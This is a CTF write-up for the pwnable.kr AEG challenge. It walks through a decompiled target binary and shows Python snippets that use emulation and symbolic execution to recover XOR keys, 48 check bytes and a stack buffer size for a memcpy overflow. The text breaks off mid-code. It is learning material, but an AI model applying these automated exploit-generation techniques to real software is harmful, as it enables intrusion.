I know…​you are not supposed to spoil solutions to pwnable.kr challenges but since multiple other writeups exist out there I figured this one is now fair game.

I only describe my method and show code snippets, not a complete solution.

But since other writeups exist, why another?

I think my solution is quite different from the others so I think this post will add some value. Maybe you will think so too? Read on to find out.

AEG?

AEG is short for Automated Exploit Generation and means that at least parts of the analysis and exploit writing process needs to be automated. You get to the challenge by connecting to pwnable.kr port 9005:

$ nc pwnable.kr 9005
---------------------------------------------------
-  Welcome to AEG (Automatic Exploit Generation)  -
---------------------------------------------------
I will send you a newly compiled binary (probably exploitable) in base64 format
after you get the binary, I will be waiting for your input as a plain text
when your input is given, I will execute the binary with your input as argv[1]
you have 10 seconds to build exploit payload
wait...
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

here, get this binary and give me some crafted argv[1] for explotation
remember you only have 10 seconds... hurry up!

Yes. Each time you connect, you will be provided with a unique executable which you will need to analyze and exploit within 10 seconds.

Fortunately the overall structure of the generated programs are the same so only details need to be automated but within a pretty short time limit.

I generated a corpus of 100 binaries which I used to test my solution. I want my solution to be able to solve all my test cases well within those 10 seconds per program.

In the end I can solve each one in less than one second.

The binary

My strategy was to fully analyze one of my samples and use that to drive my exploit.

As I progressed I tested my solution on all samples and if my solution did not work an some I looked into those as well.

I will describe one of my samples and tell which parts could differ between samples.

This is what checksec has to say about elf001:

$ checksec elf001
[*] '/home/robert/code/aeg/samples/elf001'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

The PIE part is only partly true since none of the binaries are position independent but they have different numbers of loadable segments and they load at different addresses:

$ readelf -Wl elf001 | grep LOAD
  LOAD           0x000000 0x0000000000400000 0x0000000000400000 0x000808 0x000808 R E 0x200000
  LOAD           0x090000 0x0000000006890000 0x0000000006890000 0x001314 0x001314 R E 0x200000
  LOAD           0x091e10 0x0000000006a91e10 0x0000000006a91e10 0x000288 0x000998 RW  0x200000
$ readelf -Wl elf002 | grep LOAD
  LOAD           0x000000 0x0000000000200000 0x0000000000200000 0x2930b0 0x294648 RWE 0x200000

So we cannot assume offsets of ROP gadgets or globals but we can find them statically.

The program is dynamic but has had its symbol table stripped so only dynamic symbols have been preserved and so we will have to find main automatically.

Here is the reverse engineered code for elf001:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
void processEntry entry(undefined8 param_1,undefined8 param_2) {
  undefined auStack_8 [8];

  __libc_start_main(main,param_2,&stack0x00000008,FUN_06890cb0,FUN_06890d20,param_1,auStack_8);
  do { } while( true );
}

int main(int argc,char **argv) {
  uint __seed;
  size_t arg_len;
  char hex_byte [3];
  uint payload_ite_2;
  int local_1c;
  int local_18;
  int local_14;
  int payload_ite_1;
  int arg_ite;

  if (argc == 2) {
    __seed = FUN_068909af(1,2,3,4,5,6);
    srand(__seed);
    arg_len = strlen(argv[1]);
    payload_len = (int)(arg_len >> 1);
    if (payload_len < 1001) {
      payload_ite_1 = 0;
      for (arg_ite = 0; arg_ite < payload_len * 2; arg_ite = arg_ite + 2) {
        hex_byte[0] = argv[1][arg_ite];
        hex_byte[1] = argv[1][(long)arg_ite + 1];
        hex_byte[2] = '\0';
        __isoc99_sscanf(hex_byte,"%02x",payload + payload_ite_1);
        payload_ite_1 = payload_ite_1 + 1;
      }
      for (payload_ite_2 = 0; (int)payload_ite_2 < payload_len; payload_ite_2 = payload_ite_2 + 1) {
        if ((((char)local_14 == -0xe) && ((char)local_18 == -0x6b)) &&
           ((char)(((char)(local_14 << 2) + (char)(local_14 << 6) + '&') - (char)local_1c) == 'U'))
        {
          local_1c = local_18;
          local_18 = local_18 + 1;
        }
        if ((((char)local_14 == -0x2d) && ((char)local_18 == -0x1c)) && ((char)local_1c == '0')) {
          local_14 = local_1c;
          local_1c = local_1c + 1;
        }
        if ((payload_ite_2 & 1) == 0) {
          payload[(int)payload_ite_2] = payload[(int)payload_ite_2] ^ 0x88;
        } else {
          payload[(int)payload_ite_2] = payload[(int)payload_ite_2] ^ 0xa7;
        }
        if ((((char)local_14 == -3) && ((char)local_18 == 'q')) && ((char)local_1c == 'o')) {
          local_1c = local_14 + 1;
          local_14 = local_1c;
        }
      }
      puts("payload encoded. let\'s go!");
      FUN_0689090f(payload[0],payload[1],payload[2]);
      puts("end of program");
    }
    else {
      puts("payload length exceeds 1000byte");
    }
  }
  else {
    puts("usage : ./aeg [hex encoded payload]");
  }
  return 0;
}

long FUN_068909af(long param_1,long param_2,long param_3,long param_4,long param_5,long param_6) {
  ulong uVar1;

  uVar1 = FUN_0689098c();
  return uVar1 & 0xffffffff;
}

long FUN_0689098c(void) {
  return 0;
}

void FUN_0689090f(char param_1,char param_2,char param_3) {
  if (((param_1 == '\x10') && (param_2 == -0x47)) && (param_3 == '[')) {
    FUN_06890894(payload[3],payload[4],payload[5]);
  }
}

void FUN_06890894(char param_1,char param_2,char param_3) {
  if (((param_1 == '8') && (param_2 == 'p')) && (param_3 == '\0')) {
    FUN_06890814(payload[6],payload[7],payload[8]);
  }
}

void FUN_06890814(char param_1,char param_2,char param_3) {
  if (((param_1 == -0x5b) && (param_2 == -0x4c)) && (param_3 == '\\')) {
    FUN_06890798(payload[9],payload[10],payload[11]);
  }
}

void FUN_06890798(char param_1,char param_2,char param_3) {
  if (((param_1 == -10) && (param_2 == '6')) && (param_3 == '\f')) {
    FUN_06890716(payload[12],payload[13],payload[14]);
  }
}

void FUN_06890716(char param_1,char param_2,char param_3) {
  if (((param_1 == -0xe) && (param_2 == -0x6b)) && (param_3 == '\x19')) {
    FUN_068906a5(payload[15],payload[16],payload[17]);
  }
}

void FUN_068906a5(char param_1,char param_2,char param_3) {
  if (((param_1 == -7) && (param_2 == -0x69)) && (param_3 == '8')) {
    FUN_06890625(payload[18],payload[19],payload[20]);
  }
}

void FUN_06890625(char param_1,char param_2,char param_3) {
  if (((param_1 == -0x36) && (param_2 == '}')) && (param_3 == 'v')) {
    FUN_068905a9(payload[21],payload[22],payload[23]);
  }
}

void FUN_068905a9(char param_1,char param_2,char param_3) {
  if (((param_1 == -0x41) && (param_2 == -0x80)) && (param_3 == '\x12')) {
    FUN_0689052a(payload[24],payload[25],payload[26]);
  }
}

void FUN_0689052a(char param_1,char param_2,char param_3) {
  if (((param_1 == ')') && (param_2 == '\x19')) && (param_3 == -0x1b)) {
    FUN_068904ac(payload[27],payload[28],payload[29]);
  }
}

void FUN_068904ac(char param_1,char param_2,char param_3) {
  if (((param_1 == '\x11') && (param_2 == 'B')) && (param_3 == -0x54)) {
    FUN_0689042a(payload[30],payload[31],payload[32]);
  }
}

void FUN_0689042a(char param_1,char param_2,char param_3) {
  if (((param_1 == -3) && (param_2 == 'q')) && (param_3 == 'o')) {
    FUN_068903a9(payload[33],payload[34],payload[35]);
  }
}

void FUN_068903a9(char param_1,char param_2,char param_3) {
  if (((param_1 == '\x1b') && (param_2 == 'n')) && (param_3 == 'd')) {
    FUN_06890332(payload[36],payload[37],payload[38]);
  }
}

void FUN_06890332(char param_1,char param_2,char param_3) {
  if (((param_1 == '\x01') && (param_2 == -10)) && (param_3 == -0x26)) {
    FUN_068902bf(payload[39],payload[40],payload[41]);
  }
}

void FUN_068902bf(char param_1,char param_2,char param_3) {
  if (((param_1 == -0x2d) && (param_2 == -0x1c)) && (param_3 == '0')) {
    FUN_06890240(payload[42],payload[43],payload[44]);
  }
}

void FUN_06890240(char param_1,char param_2,char param_3) {
  if (((param_1 == '\x02') && (param_2 == -6)) && (param_3 == -5)) {
    FUN_068901e4(payload[45],payload[46],payload[47]);
  }
}

void FUN_068901e4(char param_1,char param_2,char param_3) {
  if (((param_1 == '0') && (param_2 == ',')) && (param_3 == -0x60)) {
    FUN_068901bc();
  }
}

void FUN_068901bc(void) {
  char local_18 [16];
  memcpy(local_18,payload + 48, payload_len - 48);
}

void FUN_068900f6(void) {
  mprotect((void *)0x0,0,0);
  return;
}

In the above there is a lot of code that has no impact on the program other than waste time…​ours included.

There are no calls to rand so the call to srand in the beginning and the generation of the seed, which is always zero, can be ignored.

Lines 34-43 and 49-52 also just update variables that are not actually used, so the following main is all that is actually needed:

int main(int argc,char **argv) {
  size_t arg_len;
  char hex_byte [3];
  uint payload_ite_2;
  int payload_ite_1;
  int arg_ite;

  if (argc == 2) {
    arg_len = strlen(argv[1]);
    payload_len = (int)(arg_len >> 1);
    if (payload_len < 1001) {
      payload_ite_1 = 0;
      for (arg_ite = 0; arg_ite < payload_len * 2; arg_ite = arg_ite + 2) {
        hex_byte[0] = argv[1][arg_ite];
        hex_byte[1] = argv[1][(long)arg_ite + 1];
        hex_byte[2] = '\0';
        __isoc99_sscanf(hex_byte,"%02x",payload + payload_ite_1);
        payload_ite_1 = payload_ite_1 + 1;
      }
      for (payload_ite_2 = 0; (int)payload_ite_2 < payload_len; payload_ite_2 = payload_ite_2 + 1) {
        if ((payload_ite_2 & 1) == 0) {
          payload[(int)payload_ite_2] = payload[(int)payload_ite_2] ^ 0x88;
        } else {
          payload[(int)payload_ite_2] = payload[(int)payload_ite_2] ^ 0xa7;
        }
      }
      puts("payload encoded. let\'s go!");
      FUN_0689090f(payload[0],payload[1],payload[2]);
      puts("end of program");
    }
    else {
      puts("payload length exceeds 1000byte");
    }
  }
  else {
    puts("usage : ./aeg [hex encoded payload]");
  }
  return 0;
}

From line 22-32 the given argument is hex decoded into a byte array which is stored in a global buffer of size 500. We will need to get its address.

Next from line 33-53 this buffer is decoded using a two byte XOR. These two bytes differ between my samples so we need to figure them out.

Finally a series of 15 function calls are made that each check the value of three bytes, and Ghidra has been good enough to tells us the intended value but in the real world it is not so simple since each byte goes through a number of transformations as can be seen in this disassembly of the function FUN_068906a5

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
PUSH       RBP
MOV        RBP,RSP
SUB        RSP,0x10
MOV        ECX,ESI
MOV        EAX,EDX
MOV        byte ptr [RBP + local_c],DIL
MOV        byte ptr [RBP + local_10],CL
MOV        byte ptr [RBP + local_14],AL
CMP        byte ptr [RBP + local_c],0xf9
JNZ        LAB_06890713

MOVZX      EAX,byte ptr [RBP + local_c]
SUB        AL,byte ptr [RBP + local_10]
CMP        AL,0x62
JNZ        LAB_06890713

MOVZX      EDX,byte ptr [RBP + local_c]
MOV        EAX,EDX
SHL        EAX,0x4
ADD        EDX,EAX
MOVZX      EAX,byte ptr [RBP + local_10]
MOV        ECX,0x53
IMUL       EAX,ECX
ADD        EAX,EDX
SUB        AL,byte ptr [RBP + local_14]
CMP        AL,0x46
JNZ        LAB_06890713

MOVZX      EAX,byte ptr [payload[20]]
MOVZX      EDX,AL
MOVZX      EAX,byte ptr [payload[19]]
MOVZX      ECX,AL
MOVZX      EAX,byte ptr [payload[18]]
MOVZX      EAX,AL
MOV        ESI,ECX
MOV        EDI,EAX
CALL       FUN_06890625

LAB_06890713:
NOP
LEAVE
RET

In line 9 in the above disassembly the first value is checked against the value 0xf9. Fair enough, but at lines 12-15 the next value is calculated to be the difference between the two arguments, and the final value is even more involved.

Only if all three arguments have the right value will the call chain go on.

The first 48 bytes are checked like this, so we need to figure out these values by somehow solving the math behind the machine code.

Back to the C code, if all checks pass the final function, FUN_068901bc, will do a memcpy of the remaining payload into a stack allocated buffer of size 16 resulting in a simple stack based buffer overflow.

The buffer size differs between my samples ranging from zero to 72 bytes so we will also have to find this out.

Automated analysis

I use the following python libraries for my analysis: pwntools, lief, unicorn, capstone and triton.

pwntools will be used for handling the network or process stream and for generating shellcode.

lief is used for parsing the structure of executable programs and I use it for loading the binaries and do relocations.

triton is a symbolic execution engine and will be used for figuring out the value of the 48 bytes.

unicorn and capstone is a machine code emulator and a disassembler. I could have used triton in place of them but they are faster and good enough for what I use them for and I want speed!

Setting up Unicorn and Capstone

Unicorn can emulate a number of architectures and needs to have its memory and registers set up.

Memory should be loaded with the executable code and its data segments and also a stack should be allocated.

A real runtime would also load all needed libraries but we won’t since we will "emulate" their behaviour. I set up a memory page filled with return instructions and each imported function will get its own address in this page. That way I can check the currently executing address against a table to see if a call has been made to an imported function and simply continue executing the return instruction after having set the return value.

Finally, we would like to know the address in the PLT where different imported symbols can be found. This is a bit tricky since no ELF structures tell us that but we know where the PLT is and disassembling it we can find which address reads which entries in the GOT and this way we can link them together.

The following code does this:

import lief
import capstone
import capstone.x86_const as c86
import unicorn
import unicorn.x86_const as u86

STACK_ADDR = 0x2000
IMPORTS = 0x4000
PAGE_SIZE = 4096
page_down = lambda x: x & ~(PAGE_SIZE-1)
page_up = lambda x: page_down(x + PAGE_SIZE - 1)
page_offset = lambda x: x & (PAGE_SIZE-1)

elf_path = './elf01'
elf = lief.parse(elf_path)
analysis = {}

# Create unicorn and capstone contexts
u = unicorn.Uc(unicorn.UC_ARCH_X86, unicorn.UC_MODE_64)
c = capstone.Cs(capstone.CS_ARCH_X86, capstone.CS_MODE_64)
c.detail = True

# Load ELF into unicorn
for s in elf.segments:
    if s.type == lief.ELF.SEGMENT_TYPES.LOAD:
        b = bytes(s.content)
        u.mem_map(page_down(s.virtual_address), page_up(page_offset(s.virtual_address) + s.virtual_size))
        u.mem_write(s.virtual_address, b)
u.mem_map(STACK_ADDR - PAGE_SIZE, PAGE_SIZE * 2) # Stack
u.mem_map(IMPORTS, PAGE_SIZE)
u.mem_write(IMPORTS, b"\xc3" * PAGE_SIZE) # Return instructions

# Fetch GOT
analysis['got'] = { r.symbol.name:r.address for r in elf.pltgot_relocations if r.has_symbol }
analysis['imports'] = {}
for i, (k, v) in enumerate(analysis['got'].items()):
    analysis['imports'][k] = IMPORTS + i
    u.mem_write(v, p64(analysis['imports'][k]))

# Fetch PLT
analysis['plt'] = {}
plt = next(filter(lambda s: s.name == '.plt', elf.sections))
plt_addr = plt.virtual_address
plt = bytes(plt.content)
# First entry is special so we skip it...each entry is 16 bytes
for off in range(16, len(plt), 16):
    i = next(c.disasm(plt[off:off+6], plt_addr + off))
    # capstone.CS_OP_MEM should have value 3 but iv'e seen it being 128!!!
    if i.id == c86.X86_INS_JMP and i.operands[0].type == 3:
        got_addr = i.operands[0].mem.disp + (plt_addr + off) + i.size
        for name, addr in analysis['got'].items():
            if addr == got_addr:
                analysis['plt'][name] = plt_addr + off

Finding main

main is the first argument passed to __libc_start_main so if we emulate the code from the entry point we can simply read the value of the rdi register when hitting __libc_start_main.

The following code does this:

def find_main_hook(u, address, size, user_data):
    if address == user_data['imports']['__libc_start_main']:
        user_data['main'] = u.reg_read(u86.UC_X86_REG_RDI)
        u.emu_stop()

u.reg_write(u86.UC_X86_REG_RSP, STACK_ADDR)
hook = u.hook_add(unicorn.UC_HOOK_CODE, find_main_hook, analysis)
u.emu_start(elf.header.entrypoint, elf.header.entrypoint + 1000)
u.hook_del(hook)

Find global payload buffer

When we get to using Triton we will need to know the address of the payload and since it is at a fixed address we will also reference it in our ROP chain so finding its address is key.

We can find it by emulating the main function which will pass it as the third argument to __isoc99_sscanf. It will only get there if the call to strlen returns a large enough value so we need to intercept this call. Other calls we don’t care about since they will just return:

def find_payload_hook(u, address, size, user_data):
    if address == user_data['imports']['strlen']:
        u.reg_write(u86.UC_X86_REG_RAX, 48)
    elif address == user_data['imports']['__isoc99_sscanf']:
        user_data['payload_addr'] = u.reg_read(u86.UC_X86_REG_RDX)
        u.emu_stop()

u.reg_write(u86.UC_X86_REG_RSP, STACK_ADDR)
u.reg_write(u86.UC_X86_REG_RDI, 2)              # Two args
u.reg_write(u86.UC_X86_REG_RSI, STACK_ADDR + 8) # Argv array
u.mem_write(STACK_ADDR + 16, p64(STACK_ADDR + 24))
u.mem_write(STACK_ADDR + 24, b"a" * 1000)
hook = u.hook_add(unicorn.UC_HOOK_CODE, find_payload_hook, analysis)
u.emu_start(analysis['main'], analysis['main'] + 1000)
u.hook_del(hook)

Find XOR key

We need to encode our payload using a two byte key and we can find them by emulating main and hooking memory writes.

The code that decodes will first read a byte from the payload, xor it, and finally write it back, so if we zero fill the payload then the value written to the first two bytes of the payload will be our key.

def find_xor_keys_hook(u, access, address, size, value, user_data):
    if address == user_data['payload_addr']:
        user_data['xor'][0] = value
    elif address == user_data['payload_addr'] + 1:
        user_data['xor'][1] = value
        u.emu_stop()

def strlen_hook(u, address, size, user_data):
    if address == user_data['imports']['strlen']:
        u.reg_write(u86.UC_X86_REG_RAX, 48)

analysis['xor'] = [None, None]
u.reg_write(u86.UC_X86_REG_RSP, STACK_ADDR)
u.reg_write(u86.UC_X86_REG_RDI, 2)              # Two args
u.reg_write(u86.UC_X86_REG_RSI, STACK_ADDR + 8) # Argv array
u.mem_write(STACK_ADDR + 16, p64(STACK_ADDR + 24))
u.mem_write(STACK_ADDR + 24, b"a" * 1000)
hook1 = u.hook_add(unicorn.UC_HOOK_CODE, strlen_hook, analysis)
hook2 = u.hook_add(unicorn.UC_HOOK_MEM_WRITE, find_xor_keys_hook, analysis)
u.emu_start(analysis['main'], analysis['main'] + 1000)
u.hook_del(hook1)
u.hook_del(hook2)

Find first call in chain

We will be using Triton for extracting the 48 bytes but it is a bit slow, which is why we used Unicorn and Capstone for this initial part.

Because of this we would like to know the address where the first function in the chain is called.

Again by emulating main we can find this since it is the return address from the first call to puts:

def find_root_hook(u, address, size, user_data):
    if address == user_data['imports']['strlen']:
        u.reg_write(u86.UC_X86_REG_RAX, 48)
    elif address == user_data['imports']['puts']:
        rsp = u.reg_read(u86.UC_X86_REG_RSP)
        user_data['root'] = u64(u.mem_read(rsp, 8))
        u.emu_stop()

u.reg_write(u86.UC_X86_REG_RSP, STACK_ADDR)
u.reg_write(u86.UC_X86_REG_RDI, 2)              # Two args
u.reg_write(u86.UC_X86_REG_RSI, STACK_ADDR + 8) # Argv array
u.mem_write(STACK_ADDR + 16, p64(STACK_ADDR + 24))
u.mem_write(STACK_ADDR + 24, b"a" * 1000)
hook = u.hook_add(unicorn.UC_HOOK_CODE, find_root_hook, analysis)
u.emu_start(analysis['main'], analysis['main'] + 1000)
u.hook_del(hook)

Calculate value of 48 bytes

Now it’s time to bring in the big guns. Triton!

Triton is an emulator on drugs. A symbolic (concolic actually) execution engine.

It views memory and registers as either concrete or symbolic. If it is concrete, it has a value. If it is symbolic, it has a value AND Triton will remember everything that happens with this memory location or register.

Also everything a symbolized value affects will itself be symbolized.

If symolized memory is read into a register, that register is now symbolized until being overwritten by concrete data.

If a symbolized register is written to memory, that address is now symbolized.

That is the short version. At every point in the execution you can ask questions such as "is the RAX register symbolized?" if so "what do I need to do in order to make RAX have the value 0xdeadbeef?" or "what is needed in order to make this conditional jump happen?".

Quite powerful.

Setting up Triton

First we need to create a Triton context and load it with memory the same as we did with Unicorn.

When having done that we will mark the 48 byte buffer as symbolized.

import triton

analysis['payload'] = [None for _ in range(48)]
# Create Triton context and load binary into it
ctx = triton.TritonContext(triton.ARCH.X86_64)
rdi = ctx.registers.rdi
rip = ctx.registers.rip
rsp = ctx.registers.rsp
rbp = ctx.registers.rbp
for s in elf.segments:
    if s.type == lief.ELF.SEGMENT_TYPES.LOAD:
        b = bytes(s.content)
        ctx.setConcreteMemoryAreaValue(s.virtual_address, b)

ctx.setConcreteMemoryAreaValue(IMPORTS, b"\xc3" * PAGE_SIZE)
ctx.setConcreteMemoryAreaValue(STACK_ADDR - PAGE_SIZE, b"\0" * PAGE_SIZE * 2)
for k, v in analysis['got'].items():
    ctx.setConcreteMemoryValue(triton.MemoryAccess(v, 8), analysis['imports'][k])
ctx.setConcreteRegisterValue(rsp, STACK_ADDR)
ctx.setConcreteRegisterValue(rbp, STACK_ADDR)

# Symbolize the memory where our payload is placed
for i in range(48):
    ctx.symbolizeMemory(triton.MemoryAccess(analysis['payload_addr'] + i, 1), f"payload_{i:02d}")

Executing concolically

So, you can ask Triton for values that will make jumps happen or fail.

You can use this to build an emulator that reaches all code in a function which is a more generic solution that what I did, but I cheated since I want speed!

I noticed that all checks are done using JNZ instructions and they should all fail since they jump to the end of the function. They jump if the zero flag is reset, so I need it to be set.

So I simply emulate code until I reach a JNZ/JNE instruction. I will then ask for values that will make the zero flag be set and add that to a set of constraints.

Constraints are what restricts the symbolized values that Triton works on and I will use them to set the values of my payload array little by little.

The analysis ends when we hit the address of memcpy. Also, when we do that we can calculate the size of the stack buffer and thus how much data we need before overwriting the return address.

addr = analysis['root']
astctx = ctx.getAstContext()
path = astctx.equal(astctx.bvtrue(), astctx.bvtrue())
conditions = [path]
while True:
    if addr == analysis['imports']['memcpy']:
        # We reached our end goal. Our model should now be complete
        # and we can calculate the buffer size from current concrete
        # register values
        analysis['buffer_size'] = ctx.getConcreteRegisterValue(rbp) - ctx.getConcreteRegisterValue(rdi) + 8
        break

    # Read instruction bytes
    insbytes = ctx.getConcreteMemoryAreaValue(addr, 15)
    # Create instruction
    ins = triton.Instruction(addr, insbytes)
    # Run instruction
    ctx.processing(ins)

    if ins.getType() == triton.OPCODE.X86.JNE:
        _, ast = ins.getReadRegisters()[0]
        ast = ctx.simplify(ast, True)
        conditions.append(ast == 1)
        model, state, _ = ctx.getModel(astctx.land(conditions), True)
        if state == triton.SOLVER_STATE.SAT:
            for m in model.values():
                idx = int(m.getVariable().getAlias().split('_')[1])
